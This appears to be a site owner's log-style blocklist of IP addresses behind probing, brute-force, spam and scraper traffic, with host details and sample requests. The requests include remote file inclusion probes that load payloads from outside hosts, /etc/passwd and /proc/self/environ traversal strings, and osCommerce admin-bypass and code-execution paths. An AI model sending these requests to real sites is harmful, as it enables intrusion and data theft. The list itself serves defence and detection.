Host: United States – West Hollywood Media Temple Inc.
Web server: 20 websites
Hacker – Trying to access site admin
/admin/administrators.php/login.php
142.4.213.101 Hostname: ks4004147.ip-142-4-213.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer
multiple hits on honeypot trap file
217.69.133.248 Hostname: fetcher7-1.p.mail.ru
Host: Russian Federation – Moscow Limited Liability Company Mail.ru
Unwanted search bot
Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http: //go.mail.ru/help/robots)
83.219.84.220 Host: Netherlands – Amsterdam Is Group B.v.
Web server: 8 websites
Hacker – Remote File Inclusion probe / WordPress timthumb RFI exploit:
xmlrpc.php%22%20/%3E%20%3C!–[if%20lt%20IE%209]%3E%3Cscript%20
src=%22http: //DOMAIN/wp-content/themes/d5-business-line/includes/thumb.php
?src=http: //blogger.com.azarnejat.com/img.php
User agent: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)
94.141.35.166 Host: Russian Federation – Voronezh Ic-voronezh Hacker – Looking for site admin
/admin.php
/administrator/index.php
Dictionary attack on /wp-login.php
72.32.36.156 Hostname: fw-n01.wc1.dfw1.stabletransit.com
Host: United States – San Antonio Cloud Sites Wc1.dfw
WordPress admin attack
/blog/wp-admin/
207.155.252.4 Hostname: rodney.cnchost.com
Host: United States – San Jose Concentric
Web server: 7 websites
WordPress admin attack
/wordpress/wp-admin/
72.29.89.77 Host: United States – Orlando Hostdime.com Inc.
Web server: 263 websites
WordPress admin attack
/wp/wp-admin/
87.106.245.51 Hostname: importjf.com
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 10 websites
Hacker – Probing for Joomla JCE RFI exploit
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http: //www.istanbuldenizotobusu.com/license.php
176.43.31.27 Host: Turkey – Istanbul Tellcom Kartal Fttx Fiber WordPress admin attack
212.117.172.80 Hostname: ip-static-212-117-172-80.as5577.net
Host: Luxembourg – Steinsel Root Sa
Web server: 5 websites
Running a bot with UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
23.228.194.231 Host: United States – Los Angeles Psychz Networks Hacker – Brute Force Dictionary attack on WordPress.
185.25.84.149 Host: United States – Houston Privax Ltd Suspicious activity – looking for URL/+"nseasy.com"&num=
188.124.28.79 Hostname: 3162250319.dynamic.vital.net.tr
Host: Turkey – Bursa Vital Teknoloji Telekomunikasyon Bilgisayar Hizmetleri Ve Sanayi Ticaret Ltd Sirketi
WordPress admin attack
115.196.93.136 Host: China – Hangzhou Chinanet-zj Hangzhou Node Network WordPress admin attack
159.83.168.254 Host: United States – Los Angeles County Of Los Angeles Looking for /verify-LAC_Compliance?
69.65.94.117 Hostname: weston-69.65.94.117.myacc.net
Host: United States – Weston Advanced Cable Communications
Malicious user agent – PERL object UA.
Not a valid browser agent
WWW-Mechanize/1.72
187.18.145.4 Host: Brazil – Fortaleza Videomar Rede Nordeste S/a Fake Googlebot
179.210.85.154 Hostname: b3d2559a.virtua.com.br
Host: Brazil – Nilopolis Net Servicos De Comunicacao S.a.Logistica S/a
Fake Googlebot
177.135.158.18 Hostname: tegma.static.gvt.net.br
Host: Brazil – Sao Bernardo Do Campo Tegma Gestao Logistica S/a
Fake Googlebot
54.208.176.186 Hostname: ec2-54-208-176-186.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web scraper / Feed embedder bot
User Agent: GermCrawler
88.238.251.150 Hostname: 88.238.251.150.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirket
Mail server / Dictionary attacker
Bad host
113.143.70.41 China – Xi’an Chinanet Shaanxi Province Network Brute force dictionary attack on WordPress login
95.110.143.119 Hostname: host119-143-110-95.serverdedicati.aruba.it
Host: Italy – Arezzo Aruba S.p.a.
Web server: 4 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.14.103 Hostname: s15412335.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – hummingbirdbakery.com
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.55.185.242 Hostname: 216-55-185-242.dedicated.abac.net
Host: United States – Lenexa Codero
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.252.2.25 Hostname: 87-252-2-25.oxyd.net
Host: France – Paris Oxyd
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
72.167.99.183 Hostname: ip-72-167-99-183.ip.secureserver.net
Host: United States – New York City Godaddy.com Llc
Web server: 6 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
2.50.181.235 Host: United Arab Emirates – Dubai Emirates Telecommunications Corporation Spammer – looking for WordPress /xmlrpc.php
Malicious user agent: Java/1.7.0_13
DDoS attack – several hundred requests for xmlrpc.php in short time
64.151.226.153 Host: Canada – Burnaby In2net Network Inc.
Web server: 3 websites – babymyths.com , johncornegge.com , thinkorangemedia.com
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
84.7.115.94 Host: France – Boulogne-billancourt Societe Francaise Du Radiotelephone S.a. Malformed bot – crawled site looking for non-existent or partial links
UA: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
54.225.192.117 Hostname: ec2-54-225-192-117.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web server: 12 websites
rankinsider.com
Another faulty “ranking” website
Indexes non-existent/broken URLs
92.80.119.97 Romania – Bucharest Romtelecom S.a. Looking for WordPress 3.5.2 Java files
54.221.64.115 Hostname: ec2-54-221-64-115.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web server: 11 websites
Trying to hotlink to images
141.0.23.36 Hostname: m05s3-2-26db.ispgateway.de
Host: United States – Seattle Domainfactory Gmbh
Web server: 86 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
88.74.138.21 Hostname: dslb-088-074-138-021.pools.arcor-ip.net
Host: Germany – Eschborn Vodafone Gmbh
User Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.150.182.152 Hostname: 64-150-182-152.dedicated.codero.net
Host: United States – Lenexa Codero
Web server: 5 websites
User Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
196.40.97.14 Hostname: www91.cpt1.host-h.net
Host: South Africa – Cape Town Cpt Managed
HETZNER
Web server: 200 websites
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
174.37.87.58 Hostname: mail.penders.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 1 website – penders.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
46.19.136.212 Host: Switzerland – Zurich Clientid Probing for known WordPress vulnerabilities in:
1. Tell A Friend plugin: /wp-content/plugins/tell-a-friend/tell-a-friend.php
2. Braille plugin: /wp-content/plugins/braille/braille.php
142.4.215.194 Hostname: sn63-na.hostingpanel1.com
Host: Canada Montreal Ovh Hosting Inc.
OVH Systems
Web server: 300 websites
Looking for WordPress ReFlex Gallery Plugin exploit vulnerability
//wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
Using known hacker bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
110.45.180.149 Host: Korea, Republic Of Seoul Lg Dacom Kidc
Web server: 47 websites
Attempting osCommerce/Zencart Arbitrary Code Execution exploit:
/admin/sqlpatch.php/password_forgotten.php
/admin/sqlpatch.php/password_forgotten.php?action=execute
173.208.80.53 Hostname: 173.208.80.53.op-net.com
Host: United States – Chicago Ubiquity Server Solutions Chicago
Nobis Technology Group
Looking for local file disclosure exploit
/cart.php?a=byroe&templatefile=../../../configuration.php%00
142.234.220.199 Hostname: 142.234.220.199.rdns.ubiquity.io
Host: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Nobis Technology Group
Web server: 6 websites
Looking for Joomla FCK editor exploit vulnerability
90.44.210.191 Hostname: AOrleans-158-1-51-191.w90-44.abo.wanadoo.fr
Host: France – Orleans Orange S.a.
Malicious User Agent “Squider/0.01”
67.221.255.75 Host: United States – Houston Internet Archive Spidered site at very high rate looking for scripts and images
similar to DDoS attack
85.214.47.178 Hostname: h1697071.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 5 websites
Looking for Joomla FCK editor exploit:
/images/stories/bot.php
/images/stories/indo.php
207.241.226.239 Hostname: wwwb-live3.us.archive.org
Host: United States – Houston Internet Archive
Internet Archive
User agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Badly programmed bot
Rule breaker – crawling Java Scripts
144.76.69.142 Hostname: 144-76-69-142.crawler.sistrix.net
Host: Germany – Berlin Server Block
HETZNER-AS Hetzner Online AG
User agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Sistrix Crawler
Badly programmed bot
Rule breaker
Resource waster
184.107.218.154 Hostname: p2p.courtq.com
Host: Canada – Montreal Parasane
Shared hosting Web server: 25 websites
Probing for xmlrpc.php exploit
90.44.210.191 Hostname: AOrleans-158-1-51-191.w90-44.abo.wanadoo.fr
Host: France – Orleans Orange S.a.
Some sort of badly programmed spider
Generated hundreds of 404’s for malformed URLs
212.227.114.154 Hostname: infong548.kundenserver.de
Host: Germany – Karlsruhe 1&1 Internet Ag
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.136.55.143 Host: United Kingdom – Derby Webfusion Internet Solutions
Shared hosting Web server: 13 websites
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.118.84.183 Hostname: ns.km32238-12.keymachine.de
Host: Germany – Erfurt Keyweb Ag
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.118.92.5 Hostname: ns.km23726-02.keymachine.de
Host: Germany – Erfurt Keyweb Ag
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.252.2.25 Hostname: 87-252-2-25.oxyd.net
Host: France – Paris Oxyd
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
74.208.102.248 Hostname: s15357523.onlinehome-server.com
Host: United States – Wayne 1&1 Internet Inc.
Shared hosting Web server: 5 websites
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
190.81.104.122 Host: Peru – Lima America Movil Peru S.a.c.
Web server: 1 website – facilsoft.pe
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.151.226.128 Host: Canada – Burnaby In2net Network Inc.
Shared hosting Web server: 4 websites
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.247.24.207 Hostname: vps980dds.dns26.com
Host: France – Villeurbanne Serveur Dedie Client
Web server: 1 website – institutamadeus.com
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.141.188 Hostname: euve11352.server4you.net
Host: Germany – Berlin Intergenia Ag
Web server: 3 websites – double-d-design.de , dulisha.com , onlineprobistip.com
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.152.121 Hostname: vs152121.vserver.de
Host: Germany – Berlin Intergenia Ag
Web server: 1 website – mojotion.net
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.157.159 Hostname: euve22130.startvps.com
Host: Germany – Berlin Intergenia Ag
Web server: 1 website – bcmempleo.org
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.235.53.4 Hostname: lasvegas-nv-datacenter.com
Host: United States – Las Vegas Las Vegas Nv Datacenter
Web server: 1 website – abhaytechnologies.com
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.31.196.160 Hostname: jn478.jn-hebergement.com
Host: France – Marseille Jaguar Network Sas
Shared hosting web server: 28 websites
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
91.209.192.2 Host: Netherlands – Rotterdam Drecomm Bv
Web server: 1 website – betermetarbo.nl
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
217.170.194.64 Hostname: vps-1000267-208.stwadmin.net
Host: Norway – Oslo Servetheworld As
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
212.227.114.154 Hostname: infong548.kundenserver.de
Host: Germany – Karlsruhe 1&1 Internet Ag
LFI (local file inclusion) hack attempt
/wp-admin/post.php?post=25&action=/proc/self/environ%00
/wp-admin/post.php?post=../../../../../../../../../../etc/passwd%00&action=edit
173.236.69.196 Hostname: dedisvr01.beehause.com
Host: United States – Chicago Singlehop Inc.
Shared hosting web server: 28 websites
LFI (local file inclusion) hack attempt
/wp-admin/post.php?post=25&action=/proc/self/environ%00
/wp-admin/post.php?post=../../../../../../../../../../etc/passwd%00&action=edit
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.214.145.31 Hostname: h1742161.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 1 website – handball-landsberg.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.189.125 Hostname: euve19829.vserver.de
Host: Germany – Hurth Intergenia Ag
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
193.169.195.61 Host: Latvia – Internet Access Provider Brute Force / dictionary attacker
Trying to force login to WordPress with user name admin
62.75.137.207 Hostname: euve2396.vserver.de
Host: Germany – Hurth Intergenia Ag
Web server: 1 website – evezocker.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.55.121.123 Host: Spain – Madrid Iam Informatica Del Ayuntamiento De Madrid
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
//shopadmin/administrators.php/login.php
54.214.19.208 Hostname: ec2-54-214-19-208.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
Web server: 3 websites – clickhorse.com.br , igniscom.com.br , supportemarchador.com.br
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.245.19 Hostname: ssr-vermittlung.de
Host: Germany – Hurth Intergenia Ag
Web server: 2 websites – servcc10.net , ssr-vermittlung.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.255.19 Hostname: s15855202.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – testingwd.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.235.66.228 Hostname: advais.com
Host: United States – Green Bay Netsonic
Shared hosting web server: 12 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
194.63.140.126 Host: Russian Federation – Moscow Superservers Ltd
User Agent: Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
209.172.35.154 Host: Canada – Montreal Iweb Dedicated Hd
Web server: 1 website – skwppv.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
74.55.73.74 Hostname: server.cepublishing.com
Host: United States – Houston Theplanet.com Internet Services Inc
Shared hosting web server: 7 websites
WordPress trackback spammer
62.75.252.219 Hostname: london219.server4you.de
Host: Germany – Hurth Intergenia Ag
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
69.54.28.180 Hostname: rb-sip2-180.greenmountainaccess.net
Host: United States – Bomoseen Gma
Shared hosting web server: 14 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.193.199.41 Hostname: static-70-170-73-69.nocdirect.com
Host: France – Antibes Amen
Web server: 2 websites – aprim.experts-comptables.fr , uranie-conseil.fr
Trying to upload malware using recently discovered VBulletin exploit
/core/install/upgrade.php
92.136.158.221 Hostname: AToulouse-652-1-232-221.w92-136.abo.wanadoo.fr
Host: France – Toulouse Orange S.a.
Badly programmed crawler – generates a lot of 404 errors
98.151.193.103 Hostname: cpe-98-151-193-103.socal.res.rr.com
Host: United States – Canyon Country Time Warner Cable Internet Llc
Crawling site for links with:
Xenu Link Sleuth/1.3.8
85.17.29.205 Hostname: nl1.vpn-confidentiel.com
Host: Netherlands – Amsterdam Leaseweb B.v.
Dictionary attacker trying to access WordPress with user name “admin”
93.114.42.145 Hostname: lh17921.voxility.net
Host: Romania – Balotesti Voxility Srl
Shared hosting web server: 108 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Hacker bot User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.9.2) Gecko/20100115 Firefox/3.6
89.221.250.12 Hostname: www12.aname.net
Host: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting web server: 865 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
207.58.182.172 Hostname: ns1.webportfolio.co.za
Host: United States – Mclean Servint
Shared hosting web server: 29 websites
Looking for scripts and other bad requests:
/apache_pb2.gif
/drupal.js
/tableheader.js/
/tabledrag.js
/misc/CVS/Tag
/misc/ahah.js
/CHANGELOG
/COLLAPSE.txt
69.73.170.70 Hostname: static-70-170-73-69.nocdirect.com
Host: United States – New York City Landis Holdings Inc
Web server: 1 website – alaswaq.tv
Comment spammer – running spam bot from this website/IP
139.1.148.6 Host: Germany – Frankfurt Am Main Gedas Operational Services Gmbh & Co. Kg Comment spammer – spam bot
Perl Object UA: WWW-Mechanize/1.72
64.131.73.48 Hostname: vps.mayawebservices.net
Host: United States – Mclean Servint
Shared hosting web server: 40 websites
Hacker bot looking for known vulnerability in
/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
108.58.206.82 Hostname: ool-6c3ace52.static.optonline.net
Host: United States – Fairfield Fairfiel Med Group
Looking for Adobe ColdFusion directory traversal exploit:
/CFIDE/administrator/index.cfm
85.17.122.174 Hostname: 85-17-122-174.dyn.isp.wi-free.org
Host: Netherlands – Amsterdam Leaseweb B.v.
Looking for VBulletin exploit: /core/install/upgrade.php
Looking for Linux server exploit: /scripts/run-tests.sh
91.197.19.103 Hostname: NAT-103.astra.od.ua
Host: Ukraine – Illichivs’k Astratelkom Llc
Trying to upload malware using recently discovered VBulletin exploit
/core/install/upgrade.php
74.208.198.184 Hostname: u15368113.onlinehome-server.com
Host: United States – Wayne 1&1 Internet Inc.
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
84.240.30.56 Host: Lithuania – Vilnius Penki Kontinentai Ltd. Comment spammer
Bad host
85.214.95.38 Hostname: h1487364.stratoserver.net
Host: Germany – Berlin Strato Ag
Shared hosting web server: 11 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.131.73.48 Hostname: vps.mayawebservices.net
Host: Mexico – United States Mclean Servint
Shared hosting web server: 39 websites
Hacker looking for known vulnerability in OpenFlashChart library
/library/openflashchart/php-ofc-library/ofc_upload_image.php
Vulnerable systems include Drupal and Joomla versions of CiviCRM
148.243.214.3 Hostname: na-148-243-214-3.static.avantel.net.mx
Host: Mexico – Mexico City Sistema De Informacion Y Comunicacion Del Estado
Shared hosting web server: 7 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
88.253.3.254 Hostname: 88.253.3.254.dynamic.ttnet.com.tr
Host: Turkey – Ceyhan Turk Telekomunikasyon Anonim Sirketi
Brute force / Dictionary attacker
89.188.143.35 Hostname: ediweb2.editions.it
Host: Italy – Sassari Televideocom Srlt
Shared hosting web server: 9 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.20.137 Hostname: s15408148.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 2 websites – parcit.de , updatebanksteuerung.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
172.245.214.149
172.245.214.210
Host: United States – Williamsville New Wave Netconnect Llc Comment spammer
24.21.79.112 Hostname: c-24-21-79-112.hsd1.wa.comcast.net
Host: United States – Vancouver Comcast Cable Communications
Looking for WordPress admin vulnerability
Botnet User Agent: Mozilla/5.0 (Windows NT 6.1;
rv:19.0) Gecko/20100101 Firefox/19.0
98.212.107.92 Hostname: c-98-212-107-92.hsd1.il.comcast.net
Host: United States – Calumet City Comcast Cable Communications Inc.
Scanning for admin exploits
Botnet User Agent: Mozilla/5.0 (Windows NT 6.1;
rv:19.0) Gecko/20100101 Firefox/19.0
69.195.71.177 Host: United States – Provo Unified Layer
Shared hosting web server: 4 websites
Scraper / plagiarist – memeposts.com
178.137.41.84 Hostname: 178-137-41-84-kre.broadband.kyivstar.net
Host: Ukraine – Kiev Kyivstar Pjsc
Brute force / dictionary attack on /wp-login.php
200 attempts in 2 minutes
91.151.215.1 Hostname: vs6.Register1.net
Host: United Kingdom – London Serverstream Ltd
Shared hosting web server: 106 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
37.200.67.74 Host: Russian Federation – Saint Petersburg Ooo Network Of Data-centers Selectel
Shared hosting web server: 52 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/plugins/cms-pack/timthumb.php?src=http: //flickr.com.tr.realityinformatica.com/bad.php
69.64.57.6 Hostname: usloft3432.serverloft.com
Host: United States – Saint Louis Hosting Solutions International Inc.
Repeated requests for /LoginServlet
(Database login exploit attempt)
198.50.211.110 Host: Canada – Montreal Ovh Hosting Inc. Comment spammer
Repeated request for /?p=
Bad host: Montreal Ovh Hosting Inc
96.127.158.50 Hostname: sh1.hostmdm.com
Host: United States – Chicago Singlehop Inc
Some sort of mis-configured bot
Probably a scraper
190.106.203.234 Hostname: 190.106.203.234.tigo.net.gt
Host: Guatemala – Guatemala City Agencia De Vehiculos Kenworth De Centroamerica Sociedad Anonima
Looking for admin exploit
206.253.226.12
206.253.225.213
206.253.226.18
206.253.226.14
206.253.226.22
206.253.226.23
206.253.226.88
206.253.226.148
Host: United States – Clinton Internet Security Systems Spy bot: oBot/2.3.1
User agents:
Mozilla/4.0 (compatible; MSIE 5.0; Windows 99; BBOT 1.0)
Mozilla/5.0 (compatible; oBot/2.3.1; +http: //filterdb.iss.net/crawler/)
Mozilla/5.0 (compatible; oBot/2.3.1; +http: //www-935.ibm.com/services/us/index.wss/detail/iss/a1029077?cntxt=a1027244)
yacybot (webportal-global; x86 Windows 2003 5.2; java 1.7.0_25; Europe/en) http: //yacy.net/bot.html
81.144.138.34
81.144.138.40
Hostname: crawl-81-144-138-34.wotbox.com
crawl-81-144-138-40.wotbox.com
Host: United Kingdom – Coventry Ayima Ltd
Ayima SEO Bot – resource waster / spy bot
UA: Wotbox/2.01 (+http://www.wotbox.com/bot/)
184.82.151.90 Hostname: 184-82-151-90.static.hostnoc.net
Host: United States – Scranton Network Operations Center Inc.
Spammer. Trying to register and add content:
/?q=node/add
/?q=user/register
189.192.114.169 Hostname: customer-PUE-114-169.megared.net.mx
Host: Mexico – Guadalajara Mega Cable S.a. De C.v.
Spammer. Trying to register and add content:
/?q=node/add
/?q=user/register
96.0.254.95 Hostname: 95.vps.opentransfer.com
Host: United States – Columbus Yourserveradmin
OPENTRANSFER-ECOMMERCE – Ecommerce Corporation
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.224.174.86 Hostname: healthenterprisesnetwork.com
Host: United States – Sacramento Softcom America Inc
Malicious bot
BOT/0.1 (BOT for JCE)
91.238.134.75 Hostname: hosted-by.slaskdatacenter.pl
Host: Poland – Tarnowskie Gory Livenet Sp. Z O.o.
Comment spammer
Found honeypot trap
87.110.220.55 Hostname: paula.tups.lv
Host: Latvia – Riga Ltct Server Farm K
Shared hosting web server: 53 websites
Malicious shell script injection probe
/index.php?l==../../../../../../../../../../../../../../../../../../..
/../../../../..//proc/self/environ%0000
96.126.121.239 Hostname: pumpkinbyte.com
Host: United States – Dallas Linode
Shared hosting web server: 5 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/&;sa=U&;ei=gutIUpLpH5Wv4APa_ICQAg&;ved=0CB8QFjAB&;usg=AFQjCNEm37oaOGiZUqKUx6U36j_7NBnqKg/wp-content/plugins/
easy-gallery-slider/timthumb.php?src=http: //blogger.community.usatop100.com/usa.php/wp-content/plugins/easy-gallery-slider/timthumb.php?src=http: //blogger.community.
usatop100.com/usa.php
82.165.150.228 Hostname: s15440330.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
